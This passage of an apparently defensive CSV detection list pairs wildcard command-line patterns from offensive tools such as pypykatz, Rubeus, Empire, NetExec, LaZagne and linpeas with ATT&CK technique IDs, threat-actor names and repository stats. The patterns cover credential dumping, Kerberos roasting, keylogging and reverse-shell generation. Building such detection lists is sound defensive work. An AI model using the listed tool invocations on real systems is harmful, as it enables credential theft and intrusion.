pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache del *.ccache*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache exportkirbi *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache list *.ccache*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache loadkirbi *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache roast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos keytab *.keytab*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos kirbi parse *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos spnroast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos tgt *kerberos+rc4://*:*@*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --key examples/conspicuous.priv --isconspicuous*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --key PPLBlade*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* keylogger *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* --keyword * --check --ocr * --alexa*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"* -KillDate *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -KillDays *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* kimi.py *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"* KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"* klist * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* knx-gateway-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* KRB hijacking module *","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"* krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --krbpass * --krbsalt * -t * --escalate-user *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --krbpass *--krbsalt*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"* -l nmapRssuilt.xml -v*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"* Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* Ladon.py*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"* laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"* laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"* laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* lazypariah*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"* ldap * --gmsa *dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * -M whoami *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --ldapusername * --ldappassword *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* ldeep_dump *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"* lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* linpeas.sh *","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"* linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -linpeas=http://127.0.0.1/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"* linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --list=hidden-options*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --list-payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"* live dpapi blobfile *.blob*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi cred *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi keys -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi securestring *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi vcred *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi vpol *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi wifi*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos apreq *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos dump*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos purge*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos roast*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos sessions*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos tgt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos triage*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 